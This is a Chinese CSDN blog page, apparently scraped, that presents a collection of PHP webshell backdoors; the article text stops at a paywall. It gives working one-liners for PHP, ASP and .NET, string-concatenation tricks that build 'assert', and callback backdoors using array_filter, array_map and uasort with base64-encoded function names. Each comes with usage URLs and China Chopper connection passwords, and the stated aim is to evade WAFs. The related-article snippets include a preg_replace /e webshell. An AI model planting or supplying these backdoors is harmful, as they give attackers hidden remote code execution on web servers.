【WEB】webshell回调php总结

最新推荐文章于 2024-06-21 09:12:08 发布
最新推荐文章于 2024-06-21 09:12:08 发布
阅读量4.2k 收藏 11
点赞数 1
分类专栏: Webshell 文章标签: Webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81842084
版权
本文详细介绍了如何利用PHP的回调函数如array_filter, array_map, uasort等配合base64_decode等技巧绕过Web应用防火墙(WAF),并列举了多种PHP一句话后门的实现方式,包括array_filter, array_map, preg_replace等,旨在探讨如何构造隐蔽的PHP后门。" 109458608,9964150,Spring整合JDBC与MyBatis教程,"['Spring框架', '数据库集成', 'MyBatis', '事务处理', 'Java开发']
摘要由CSDN通过智能技术生成

 目录 

经典一句话

利用简单的拼接字符串

利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)

1. 利用 array_filter+base64_decode

2.利用array_map+base64_decode

3.利用uasort+base64_decode 

4.利用array_walk+preg_replace

5.利用array_walk_recursive+preg_replace

6.利用mb_ereg_replace

7.利用preg_filter

8.利用register_shutdown_function

9.利用register_tick_function

10.利用filter_var

强悍的PHP一句话后门

                   利用404页面隐藏PHP小马:

          无特征隐藏PHP一句话:

          超级隐蔽的PHP后门:

          层级请求,编码运行PHP后门:

          PHP后门生成工具weevely

三个变形的一句话PHP木马 

         第一个

         第二个

         第三个

最后列几个高级的PHP一句话木马后门:

经典一句话

PHP: <?php @eval($_POST['pass']);?>

ASP: <%eval request("pass")%>

.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

我们写一句话最终还是要拼接成经典的一句话的,当然,实现方式不止eval,还可以是assert,而且很多时候用菜刀连接的时候使用的是assert,具体原因见 从底层分析eval和assert的区别

利用简单的拼接字符串

1.

<?php 
    $POST['POST']='assert';
    $array[]=$POST;
    $array[0]['POST']($_POST['joker']);
?>

用法:  http://www.xxx.com/1.php

菜刀连接用法:  http://www.xxx.com/1.php

密码:joker

详解:  assert,是php代码执行函数,与eval()有同样的功能,应为$array[],POST[]都是数组,所以array[]=array[]=POST,就是把POST数组的值赋给POST数组的值赋给array数组,这样的话$array[0]['POST']的输出就是assert,所以组成了一句话木马

assert($_POST['joker']),直接用菜刀链接即可

2.

<?php
error_reporting(0);
$g = array('','s');
$gg = a.$g[1].ser.chr('116');
@$gg($_POST[joker]);
?>

用法:  http://www.xxx.com/2.php

菜刀连接用法: http://www.xxx.com/2.php

密码:joker

详解:$g是个数组,g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的gg=assert,@gg(gg(_POST[joker])不就是assert($_POST[joker]),是我们常见的一句话木马,直接菜刀链接即可

利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)

1. 利用 array_filter+base64_decode

<?php $e = $_REQUEST['e'];
$arr = array($_POST['settoken'],);
array_filter($arr, base64_decode($e));
?>

 

用法:

http://www.xxx.com/settoken.php?e=YXNzZXJ0 (这里的“YXNzZXJ0 ”是assert用base64加密后的,因为源码用到了base64_decode)

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=YXNzZXJ0

密码:settoken

补充

array_filter()回调函数,原型为:

array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。这样就构成了assert($_POST['POST'])这个经典一句话

2.利用array_map+base64_decode

<?php $e = $_REQUEST['e'];
$arr = array($_POST['settoken'],);
array_map(base64_decode($e), $arr);
?>

类似上一个array_filter,都是php回调函数的利用

用法:同上一个

3.利用uasort+base64_decode 

<?php 
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['settoken']);
uasort($arr, base64_decode($e));
?>

<?php 
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['settoken'] => 2);
uksort($arr, $e);
?>

用法类似

再给出这两个函数,面向对象的方法:
// method 0
$arr = new ArrayObject(array('test', $_REQUEST['pass&#

最低0.47元/天 解锁文章
pcy190
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅析PHP-webshell
尚未佩妥剑 转眼便江湖
11-02 1473
一、PHP后门函数 1、命令执行函数 exec 适用范围:PHP 4, PHP 5, PHP 7        函数作用:执行一个外部程序,返回命令执行结果最后一行内容。 string exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] ) &lt;?php echo exec('cd')...
PHP preg_replace函数 webshell
yuanfengfengyuan的博客
06-05 259
MSG preg_replace 函数执行一个正则表达式的搜索和替换。 <? echo preg_replace("/test/e",$_GET["h"],"jutst test"); ?> 如果我们提交?h=phpinfo(),phpinfo()将会被执行(使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行) 案例 <?p...
ARM体系结构介绍
最新发布
nihaozz123的博客
06-21 1517
ARM 是单片机从业者,绕不开的一门技能,是从业向更深层次进阶的平台。本文章介绍ARM的构成、分布、调用,认真阅读后对此有清晰的认识,扫盲ARM概念。
网络攻击之WebShell
qq_44887910的博客
09-05 1269
WebShell 攻击
webshell免杀之函数与变量玩法
二狗的博客
02-16 397
从上述案例能看出来,想要免杀很简单,不需要花里胡哨的操作,只需要改变下结构或函数,不需要变形编码关键字也能实现免杀?查杀结果[外链图片转存中…(img-X5Fmg7Yz-1676528059990)]脚本正常连接[外链图片转存中…(img-KDLqFrLK-1676528059990)]从上述案例能看出来,想要免杀很简单,不需要花里胡哨的操作,只需要改变下结构或函数,不需要变形编码关键字也能实现免杀。
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 1532
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
-czt shell tar_web扫描
weixin_39622905的博客
12-21 969
服务器1号 可疑文件访问 111.6.78.229 /.zip 2020-07-14 22:48:37 404 8服务器1号 可疑文件访问 111.6.78.229 /.tar.gz 2020-07-14 22:48:37 404 8服务器1号 可疑文件访问 111.6.78.229 /.zip 2020-07-14 10:09:47 404 6服务器1号 可疑文件访问 111.6.78.229 ...
php木马webshell扫描器代码
12-18
PHP作为Web开发的常用语言,常常成为WebShell的载体。为了保护服务器安全,开发者需要定期对服务器进行木马扫描,及时发现并清除潜在的威胁。本文将详细解析提供的PHP木马WebShell扫描器代码,帮助你理解其工作原理...
wso_webshell_php_
10-01
总结来说,"wso_webshell_php_"这个主题涵盖了Webshell的概念、WSO这个特定的PHP Webshell工具及其不同版本的特点,以及PHP语言在网络安全中的角色。这些知识点提醒我们重视Web应用程序的安全性,防止Webshell的入侵...
php webshell 下载(自测 功能强大齐全的phpwebshell
06-30
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可。无需更改任何。(自测功能完整,无任何阉割,...
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
Web安全】无字母数字Webshell总结Web安全领域,Webshell是一种常见的攻击手段,用于在目标服务器上获得远程控制。无字母数字Webshell是指避开常规字母和数字字符限制的Webshell构造方法。通常,服务器会通过...
WebShell 路人甲WEB管理 v1.3
11-10
路人甲WEB管理具有WebShell批量检测、批量执行命令、批量查询百度权重,百度收录,正确率可达百分之九十八,是一款不可多得的必备神器。路人甲WEB管理功能介绍:打开软件后将存有
webshell免杀的一些学习和思考——以PHP为例
闵行小鱼塘
10-24 1144
凡是使用webshell时,免杀都是需要考虑的事情,说白了就是我的webshell得能用啊!故本篇做一个webshell免杀的学习,主要是php的一句话
php preg replace e,关于 preg_replace 危险的“/e”修饰符
weixin_33980343的博客
03-10 1337
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。而函数中的 /e 这个修饰符的意思就是让 正则替换之后将 replacement 参数当作 PHP 代码。该用法常在 PHP webshell 中出现。preg_replace ( mixed pattern, mixed replacem...
.user.ini文件构成的PHP后门(转)
weixin_30906425的博客
12-29 330
phith0n · 2014/10/30 10:51 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的...
WEB2.0 中应用回调事件
未来软件
07-12 652
所涉及到的函数有:服务器端:1、ClientScriptManager.GetCallbackEventReference 方法 (Control, String, String, String) Control 可用this;string 从客户端传入值的参数,回调后作为参数值的返回载体;string  客户端js脚本函数的名字此函数处理服务器端(成功)事件的结果;string 
webshell一句话木马
Jim的博客
08-18 3057
asp一句话木马 %> "" Then execute(request("sb"))%> 补充知识: asp代码执行漏洞: Eval函数接受一个包含VBScript表达式的字符串 php一句话木马  //容错代码 @eval($_POST[sb])   //绕过
PHP Webshell检测绕过技术探索
总结来说,这篇博客探讨了如何在面对当前一流的安全检测工具时,设计出更难以检测的PHP Webshell。这既揭示了网络安全领域的攻防对抗,也提醒了网站管理员和安全从业者,必须不断更新防御策略以应对日益复杂的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值